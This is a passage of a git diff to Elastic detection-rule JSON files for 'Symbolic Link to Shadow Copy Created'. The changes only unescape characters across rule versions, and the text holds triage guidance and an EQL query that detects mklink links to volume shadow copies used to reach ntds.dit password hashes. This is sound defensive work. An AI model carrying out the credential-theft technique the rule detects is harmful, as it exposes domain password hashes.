copies in order to copy sensitive information offline. If Active Directory (AD) is in use, often the ntds.dit file is a target as it contains password hashes, but an offline copy is needed to extract these hashes and potentially conduct lateral movement.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Determine if a volume shadow copy was recently created on this endpoint.\n- Review privileges of the end user as this requires administrative access.\n- Verify if the ntds.dit file was successfully copied and determine its copy destination.\n- Investigate for registry SYSTEM file copies made recently or saved via Reg.exe.\n- Investigate recent deletions of volume shadow copies.\n- Identify other files potentially copied from volume shadow copy paths directly.\n\n### False positive analysis\n\n- This rule should cause very few false positives. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- NTDS or SAM Database File Copied - 3bc6deaa-fbd4-433a-ae21-3e892f95624f\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If the entire domain or the `krbtgt` user was compromised:\n - Activate your incident response plan for total Active Directory compromise which should include, but not be limited to, a password reset (twice) of the `krbtgt` user.\n- Locate and remove static files copied from volume shadow copies.\n- Command-Line tool mklink should require administrative access by default unless in developer mode.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\nEnsure advanced audit policies for Windows are enabled, specifically:\nObject Access policies [Event ID 4656](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4656) (Handle to an Object was Requested)\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nSystem Audit Policies \u003e\nObject Access \u003e\nAudit File System (Success,Failure)\nAudit Handle Manipulation (Success,Failure)\n```\n\nThis event will only trigger if symbolic links are created from a new process spawning cmd.exe or powershell.exe with the correct arguments.\nDirect access to a shell and calling symbolic link creation tools will not generate an event matching this rule.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "note": "## Triage and analysis\n\n### Investigating Symbolic Link to Shadow Copy Created\n\nShadow copies are backups or snapshots of an endpoint's files or volumes while they are in use. Adversaries may attempt to discover and create symbolic links to these shadow copies in order to copy sensitive information offline. If Active Directory (AD) is in use, often the ntds.dit file is a target as it contains password hashes, but an offline copy is needed to extract these hashes and potentially conduct lateral movement.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Determine if a volume shadow copy was recently created on this endpoint.\n- Review privileges of the end user as this requires administrative access.\n- Verify if the ntds.dit file was successfully copied and determine its copy destination.\n- Investigate for registry SYSTEM file copies made recently or saved via Reg.exe.\n- Investigate recent deletions of volume shadow copies.\n- Identify other files potentially copied from volume shadow copy paths directly.\n\n### False positive analysis\n\n- This rule should cause very few false positives. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- NTDS or SAM Database File Copied - 3bc6deaa-fbd4-433a-ae21-3e892f95624f\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If the entire domain or the `krbtgt` user was compromised:\n - Activate your incident response plan for total Active Directory compromise which should include, but not be limited to, a password reset (twice) of the `krbtgt` user.\n- Locate and remove static files copied from volume shadow copies.\n- Command-Line tool mklink should require administrative access by default unless in developer mode.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\nEnsure advanced audit policies for Windows are enabled, specifically:\nObject Access policies [Event ID 4656](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4656) (Handle to an Object was Requested)\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nSystem Audit Policies >\nObject Access >\nAudit File System (Success,Failure)\nAudit Handle Manipulation (Success,Failure)\n```\n\nThis event will only trigger if symbolic links are created from a new process spawning cmd.exe or powershell.exe with the correct arguments.\nDirect access to a shell and calling symbolic link creation tools will not generate an event matching this rule.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.pe.original_file_name in (\"Cmd.Exe\",\"PowerShell.EXE\") and\n\n /* Create Symbolic Link to Shadow Copies */\n process.args : (\"*mklink*\", \"*SymbolicLink*\") and process.command_line : (\"*HarddiskVolumeShadowCopy*\")\n", "references": [ "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/mklink", @@ -65,7 +65,7 @@ ], "risk_score": 47, "rule_id": "d117cbb4-7d56-41b4-b999-bdf8c25648a0", - "setup": "Ensure advanced audit policies for Windows are enabled, specifically:\nObject Access policies Event ID 4656 (Handle to an Object was Requested)\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nSystem Audit Policies \u003e\nObject Access \u003e\nAudit File System (Success,Failure)\nAudit Handle Manipulation (Success,Failure)\n```\n\nThis event will only trigger if symbolic links are created from a new process spawning cmd.exe or powershell.exe with the correct arguments.\nDirect access to a shell and calling symbolic link creation tools will not generate an event matching this rule.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "Ensure advanced audit policies for Windows are enabled, specifically:\nObject Access policies Event ID 4656 (Handle to an Object was Requested)\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nSystem Audit Policies >\nObject Access >\nAudit File System (Success,Failure)\nAudit Handle Manipulation (Success,Failure)\n```\n\nThis event will only trigger if symbolic links are created from a new process spawning cmd.exe or powershell.exe with the correct arguments.\nDirect access to a shell and calling symbolic link creation tools will not generate an event matching this rule.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/d117cbb4-7d56-41b4-b999-bdf8c25648a0_105.json b/packages/security_detection_engine/kibana/security_rule/d117cbb4-7d56-41b4-b999-bdf8c25648a0_105.json index 4eca3c1dd88..42b10fc5957 100644 --- a/packages/security_detection_engine/kibana/security_rule/d117cbb4-7d56-41b4-b999-bdf8c25648a0_105.json +++ b/packages/security_detection_engine/kibana/security_rule/d117cbb4-7d56-41b4-b999-bdf8c25648a0_105.json @@ -18,7 +18,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Symbolic Link to Shadow Copy Created", - "note": "## Triage and analysis\n\n### Investigating Symbolic Link to Shadow Copy Created\n\nShadow copies are backups or snapshots of an endpoint's files or volumes while they are in use. Adversaries may attempt to discover and create symbolic links to these shadow copies in order to copy sensitive information offline. If Active Directory (AD) is in use, often the ntds.dit file is a target as it contains password hashes, but an offline copy is needed to extract these hashes and potentially conduct lateral movement.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Determine if a volume shadow copy was recently created on this endpoint.\n- Review privileges of the end user as this requires administrative access.\n- Verify if the ntds.dit file was successfully copied and determine its copy destination.\n- Investigate for registry SYSTEM file copies made recently or saved via Reg.exe.\n- Investigate recent deletions of volume shadow copies.\n- Identify other files potentially copied from volume shadow copy paths directly.\n\n### False positive analysis\n\n- This rule should cause very few false positives. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- NTDS or SAM Database File Copied - 3bc6deaa-fbd4-433a-ae21-3e892f95624f\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If the entire domain or the `krbtgt` user was compromised:\n - Activate your incident response plan for total Active Directory compromise which should include, but not be limited to, a password reset (twice) of the `krbtgt` user.\n- Locate and remove static files copied from volume shadow copies.\n- Command-Line tool mklink should require administrative access by default unless in developer mode.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\nEnsure advanced audit policies for Windows are enabled, specifically:\nObject Access policies [Event ID 4656](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4656) (Handle to an Object was Requested)\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nSystem Audit Policies \u003e\nObject Access \u003e\nAudit File System (Success,Failure)\nAudit Handle Manipulation (Success,Failure)\n```\n\nThis event will only trigger if symbolic links are created from a new process spawning cmd.exe or powershell.exe with the correct arguments.\nDirect access to a shell and calling symbolic link creation tools will not generate an event matching this rule.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "note": "## Triage and analysis\n\n### Investigating Symbolic Link to Shadow Copy Created\n\nShadow copies are backups or snapshots of an endpoint's files or volumes while they are in use. Adversaries may attempt to discover and create symbolic links to these shadow copies in order to copy sensitive information offline. If Active Directory (AD) is in use, often the ntds.dit file is a target as it contains password hashes, but an offline copy is needed to extract these hashes and potentially conduct lateral movement.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Determine if a volume shadow copy was recently created on this endpoint.\n- Review privileges of the end user as this requires administrative access.\n- Verify if the ntds.dit file was successfully copied and determine its copy destination.\n- Investigate for registry SYSTEM file copies made recently or saved via Reg.exe.\n- Investigate recent deletions of volume shadow copies.\n- Identify other files potentially copied from volume shadow copy paths directly.\n\n### False positive analysis\n\n- This rule should cause very few false positives. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- NTDS or SAM Database File Copied - 3bc6deaa-fbd4-433a-ae21-3e892f95624f\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If the entire domain or the `krbtgt` user was compromised:\n - Activate your incident response plan for total Active Directory compromise which should include, but not be limited to, a password reset (twice) of the `krbtgt` user.\n- Locate and remove static files copied from volume shadow copies.\n- Command-Line tool mklink should require administrative access by default unless in developer mode.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\nEnsure advanced audit policies for Windows are enabled, specifically:\nObject Access policies [Event ID 4656](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4656) (Handle to an Object was Requested)\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nSystem Audit Policies >\nObject Access >\nAudit File System (Success,Failure)\nAudit Handle Manipulation (Success,Failure)\n```\n\nThis event will only trigger if symbolic links are created from a new process spawning cmd.exe or powershell.exe with the correct arguments.\nDirect access to a shell and calling symbolic link creation tools will not generate an event matching this rule.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.pe.original_file_name in (\"Cmd.Exe\",\"PowerShell.EXE\") and\n\n /* Create Symbolic Link to Shadow Copies */\n process.args : (\"*mklink*\", \"*SymbolicLink*\") and process.command_line : (\"*HarddiskVolumeShadowCopy*\")\n", "references": [ "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/mklink", @@ -65,7 +65,7 @@ ], "risk_score": 47, "rule_id": "d117cbb4-7d56-41b4-b999-bdf8c25648a0", - "setup": "Ensure advanced audit policies for Windows are enabled, specifically:\nObject Access policies Event ID 4656 (Handle to an Object was Requested)\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nSystem Audit Policies \u003e\nObject Access \u003e\nAudit File System (Success,Failure)\nAudit Handle Manipulation (Success,Failure)\n```\n\nThis event will only trigger if symbolic links are created from a new process spawning cmd.exe or powershell.exe with the correct arguments.\nDirect access to a shell and calling symbolic link creation tools will not generate an event matching this rule.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "Ensure advanced audit policies for Windows are enabled, specifically:\nObject Access policies Event ID 4656 (Handle to an Object was Requested)\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nSystem Audit Policies >\nObject Access >\nAudit File System (Success,Failure)\nAudit Handle Manipulation (Success,Failure)\n```\n\nThis event will only trigger if symbolic links are created from a new process spawning cmd.exe or powershell.exe with the correct arguments.\nDirect access to a shell and calling symbolic link creation tools will not generate an event matching this rule.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -77,7 +77,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/d117cbb4-7d56-41b4-b999-bdf8c25648a0_106.json b/packages/security_detection_engine/kibana/security_rule/d117cbb4-7d56-41b4-b999-bdf8c25648a0_106.json index 213eda500b0..6f5d8ca0402 100644 --- a/packages/security_detection_engine/kibana/security_rule/d117cbb4-7d56-41b4-b999-bdf8c25648a0_106.json +++ b/packages/security_detection_engine/kibana/security_rule/d117cbb4-7d56-41b4-b999-bdf8c25648a0_106.json @@ -18,7 +18,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Symbolic Link to Shadow Copy Created", - "note": "## Triage and analysis\n\n### Investigating Symbolic Link to Shadow Copy Created\n\nShadow copies are backups or snapshots of an endpoint's files or volumes while they are in use. Adversaries may attempt to discover and create symbolic links to these shadow copies in order to copy sensitive information offline. If Active Directory (AD) is in use, often the ntds.dit file is a target as it contains password hashes, but an offline copy is needed to extract these hashes and potentially conduct lateral movement.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Determine if a volume shadow copy was recently created on this endpoint.\n- Review privileges of the end user as this requires administrative access.\n- Verify if the ntds.dit file was successfully copied and determine its copy destination.\n- Investigate for registry SYSTEM file copies made recently or saved via Reg.exe.\n- Investigate recent deletions of volume shadow copies.\n- Identify other files potentially copied from volume shadow copy paths directly.\n\n### False positive analysis\n\n- This rule should cause very few false positives. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- NTDS or SAM Database File Copied - 3bc6deaa-fbd4-433a-ae21-3e892f95624f\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If the entire domain or the `krbtgt` user was compromised:\n - Activate your incident response plan for total Active Directory compromise which should include, but not be limited to, a password reset (twice) of the `krbtgt` user.\n- Locate and remove static files copied from volume shadow copies.\n- Command-Line tool mklink should require administrative access by default unless in developer mode.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\nEnsure advanced audit policies for Windows are enabled, specifically:\nObject Access policies [Event ID 4656](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4656) (Handle to an Object was Requested)\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nSystem Audit Policies \u003e\nObject Access \u003e\nAudit File System (Success,Failure)\nAudit Handle Manipulation (Success,Failure)\n```\n\nThis event will only trigger if symbolic links are created from a new process spawning cmd.exe or powershell.exe with the correct arguments.\nDirect access to a shell and calling symbolic link creation tools will not generate an event matching this rule.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "note": "## Triage and analysis\n\n### Investigating Symbolic Link to Shadow Copy Created\n\nShadow copies are backups or snapshots of an endpoint's files or volumes while they are in use. Adversaries may attempt to discover and create symbolic links to these shadow copies in order to copy sensitive information offline. If Active Directory (AD) is in use, often the ntds.dit file is a target as it contains password hashes, but an offline copy is needed to extract these hashes and potentially conduct lateral movement.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Determine if a volume shadow copy was recently created on this endpoint.\n- Review privileges of the end user as this requires administrative access.\n- Verify if the ntds.dit file was successfully copied and determine its copy destination.\n- Investigate for registry SYSTEM file copies made recently or saved via Reg.exe.\n- Investigate recent deletions of volume shadow copies.\n- Identify other files potentially copied from volume shadow copy paths directly.\n\n### False positive analysis\n\n- This rule should cause very few false positives. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- NTDS or SAM Database File Copied - 3bc6deaa-fbd4-433a-ae21-3e892f95624f\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If the entire domain or the `krbtgt` user was compromised:\n - Activate your incident response plan for total Active Directory compromise which should include, but not be limited to, a password reset (twice) of the `krbtgt` user.\n- Locate and remove static files copied from volume shadow copies.\n- Command-Line tool mklink should require administrative access by default unless in developer mode.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\nEnsure advanced audit policies for Windows are enabled, specifically:\nObject Access policies [Event ID 4656](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4656) (Handle to an Object was Requested)\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nSystem Audit Policies >\nObject Access >\nAudit File System (Success,Failure)\nAudit Handle Manipulation (Success,Failure)\n```\n\nThis event will only trigger if symbolic links are created from a new process spawning cmd.exe or powershell.exe with the correct arguments.\nDirect access to a shell and calling symbolic link creation tools will not generate an event matching this rule.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.pe.original_file_name in (\"Cmd.Exe\",\"PowerShell.EXE\") and\n\n /* Create Symbolic Link to Shadow Copies */\n process.args : (\"*mklink*\", \"*SymbolicLink*\") and process.command_line : (\"*HarddiskVolumeShadowCopy*\")\n", "references": [ "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/mklink", @@ -65,7 +65,7 @@ ], "risk_score": 47, "rule_id": "d117cbb4-7d56-41b4-b999-bdf8c25648a0", - "setup": "Ensure advanced audit policies for Windows are enabled, specifically:\nObject Access policies Event ID 4656 (Handle to an Object was Requested)\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nSystem Audit Policies \u003e\nObject Access \u003e\nAudit File System (Success,Failure)\nAudit Handle Manipulation (Success,Failure)\n```\n\nThis event will only trigger if symbolic links are created from a new process spawning cmd.exe or powershell.exe with the correct arguments.\nDirect access to a shell and calling symbolic link creation tools will not generate an event matching this rule.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "Ensure advanced audit policies for Windows are enabled, specifically:\nObject Access policies Event ID 4656 (Handle to an Object was Requested)\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nSystem Audit Policies >\nObject Access >\nAudit File System (Success,Failure)\nAudit Handle Manipulation (Success,Failure)\n```\n\nThis event will only trigger if symbolic links are created from a new process spawning cmd.exe or powershell.exe with the correct arguments.\nDirect access to a shell and calling symbolic link creation tools will not generate an event matching this rule.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/d117cbb4-7d56-41b4-b999-bdf8c25648a0_107.json b/packages/security_detection_engine/kibana/security_rule/d117cbb4-7d56-41b4-b999-bdf8c25648a0_107.json index a1afaf5de17..c40faf846b3 100644 --- a/packages/security_detection_engine/kibana/security_rule/d117cbb4-7d56-41b4-b999-bdf8c25648a0_107.json +++ b/packages/security_detection_engine/kibana/security_rule/d117cbb4-7d56-41b4-b999-bdf8c25648a0_107.json @@ -18,7 +18,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Symbolic Link to Shadow Copy Created", - "note": "## Triage and analysis\n\n### Investigating Symbolic Link to Shadow Copy Created\n\nShadow copies are backups or snapshots of an endpoint's files or volumes while they are in use. Adversaries may attempt to discover and create symbolic links to these shadow copies in order to copy sensitive information offline. If Active Directory (AD) is in use, often the ntds.dit file is a target as it contains password hashes, but an offline copy is needed to extract these hashes and potentially conduct lateral movement.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Determine if a volume shadow copy was recently created on this endpoint.\n- Review privileges of the end user as this requires administrative access.\n- Verify if the ntds.dit file was successfully copied and determine its copy destination.\n- Investigate for registry SYSTEM file copies made recently or saved via Reg.exe.\n- Investigate recent deletions of volume shadow copies.\n- Identify other files potentially copied from volume shadow copy paths directly.\n\n### False positive analysis\n\n- This rule should cause very few false positives. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- NTDS or SAM Database File Copied - 3bc6deaa-fbd4-433a-ae21-3e892f95624f\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If the entire domain or the `krbtgt` user was compromised:\n - Activate your incident response plan for total Active Directory compromise which should include, but not be limited to, a password reset (twice) of the `krbtgt` user.\n- Locate and remove static files copied from volume shadow copies.\n- Command-Line tool mklink should require administrative access by default unless in developer mode.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\nEnsure advanced audit policies for Windows are enabled, specifically:\nObject Access policies [Event ID 4656](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4656) (Handle to an Object was Requested)\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nSystem Audit Policies \u003e\nObject Access \u003e\nAudit File System (Success,Failure)\nAudit Handle Manipulation (Success,Failure)\n```\n\nThis event will only trigger if symbolic links are created from a new process spawning cmd.exe or powershell.exe with the correct arguments.\nDirect access to a shell and calling symbolic link creation tools will not generate an event matching this rule.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "note": "## Triage and analysis\n\n### Investigating Symbolic Link to Shadow Copy Created\n\nShadow copies are backups or snapshots of an endpoint's files or volumes while they are in use. Adversaries may attempt to discover and create symbolic links to these shadow copies in order to copy sensitive information offline. If Active Directory (AD) is in use, often the ntds.dit file is a target as it contains password hashes, but an offline copy is needed to extract these hashes and potentially conduct lateral movement.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Determine if a volume shadow copy was recently created on this endpoint.\n- Review privileges of the end user as this requires administrative access.\n- Verify if the ntds.dit file was successfully copied and determine its copy destination.\n- Investigate for registry SYSTEM file copies made recently or saved via Reg.exe.\n- Investigate recent deletions of volume shadow copies.\n- Identify other files potentially copied from volume shadow copy paths directly.\n\n### False positive analysis\n\n- This rule should cause very few false positives. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- NTDS or SAM Database File Copied - 3bc6deaa-fbd4-433a-ae21-3e892f95624f\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If the entire domain or the `krbtgt` user was compromised:\n - Activate your incident response plan for total Active Directory compromise which should include, but not be limited to, a password reset (twice) of the `krbtgt` user.\n- Locate and remove static files copied from volume shadow copies.\n- Command-Line tool mklink should require administrative access by default unless in developer mode.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\nEnsure advanced audit policies for Windows are enabled, specifically:\nObject Access policies [Event ID 4656](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4656) (Handle to an Object was Requested)\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nSystem Audit Policies >\nObject Access >\nAudit File System (Success,Failure)\nAudit Handle Manipulation (Success,Failure)\n```\n\nThis event will only trigger if symbolic links are created from a new process spawning cmd.exe or powershell.exe with the correct arguments.\nDirect access to a shell and calling symbolic link creation tools will not generate an event matching this rule.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for 